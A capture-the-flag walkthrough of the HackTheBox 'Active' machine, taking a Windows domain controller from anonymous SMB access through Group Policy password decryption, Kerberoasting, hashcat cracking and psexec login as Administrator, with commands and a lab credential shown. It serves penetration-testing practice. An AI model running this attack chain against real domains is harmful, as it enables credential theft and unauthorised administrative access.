Active - HTB Series

# HTB Series - Active ###### tags: `htb` `active` `windows` `walkthrough` We start by scanning the target with nmap to find open ports ``` nmap -sC -sV -oA active 10.10.10.100``` ![image](https://hackmd.io/_uploads/r1SCgLyIC.png) Since we can see dns (53), ldap and smb (445) we are likely on a windows server. Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them. ```smbclient -L //10.10.10.100 ``` ![image](https://hackmd.io/_uploads/ryP9YIJ8R.png) The IPC$ and SYSVOL shares are expected of a domain controller. Smbmap offers similar results ![image](https://hackmd.io/_uploads/Byriq8yUC.png) We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts. ```=1 smbmap -H 10.10.10.100 -r Replication --depth 8 # depth accomplishes was recursive would have, 8 in this case was an estimate of how deep we would have to go. ``` ![image](https://hackmd.io/_uploads/HkTNJuyIR.png) The output depicts the presence of the Groups.xml file which is of interest to us so we can download it. ```=1 smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml # -A acquires the file with the specified pattern ``` ![image](https://hackmd.io/_uploads/Skbcyu1UA.png) From the downloaded file we identify the credentials as follows: ![image](https://hackmd.io/_uploads/SyDCRw1UA.png) We decrypt the password as shown: ![image](https://hackmd.io/_uploads/ry5-xuJLR.png) An alternate way to get this would be to use smbclient ```=1 smbclient //10.10.10.100/Replication Password for [WORKGROUP\cypher]: Anonymous login successful Try "help" to get a list of possible commands. smb: \> recurse ON smb: \> prompt OFF smb: \> mget * ``` ![image](https://hackmd.io/_uploads/rJ0HMukI0.png) ![image](https://hackmd.io/_uploads/By7nMu1LA.png) We then use impacket to view the users on the Domain ``` GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs ``` ![image](https://hackmd.io/_uploads/SybZcuJU0.png) We try further enumeration using the given user account as follows: ``` smbmap -d active.htb- -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100 # -d is for domain, -u is for user, -p is for password and -H is for Host ``` ![image](https://hackmd.io/_uploads/HJ0Vou1LA.png) We utilize the credentials gathered as follows: On a windows box, open up a session as the user ``` runas /netonly /user:active.htb\svc_tgs cmd ``` ![image](https://hackmd.io/_uploads/ByKT2_gLA.png) We can use bloodhound to proceed as follows: Use sharphound on the windows box ![image](https://hackmd.io/_uploads/HyADjtg8C.png) Verify the connection is working okay ![image](https://hackmd.io/_uploads/HyD5iKg8C.png) Turns out we just needed to add the DC as the primary DNS in the ethernet settings. ![image](https://hackmd.io/_uploads/H1hwAKxLA.png) From Bloodhound we query which accounts are susceptible to kerberoasting ![image](https://hackmd.io/_uploads/BJmA-qxLC.png) Attempt at Kerberoasting ![image](https://hackmd.io/_uploads/By0dZqe8R.png) From the hash acquired, we can look up on example hashcat hashes to find out the cracking mode to use ![image](https://hackmd.io/_uploads/rJY1m9lIA.png) We can then proceed to attempt to crack the hash with hashcat ![image](https://hackmd.io/_uploads/Bkcfv5eI0.png) ![image](https://hackmd.io/_uploads/ByGZv9x8C.png) We then proceed to use the credentials acquired to login as the Administrator via Psexec ``` psexec.py domain/User@ip ``` ![image](https://hackmd.io/_uploads/HJAEd5xLC.png) Own the root flag ![image](https://hackmd.io/_uploads/H1kCuce80.png)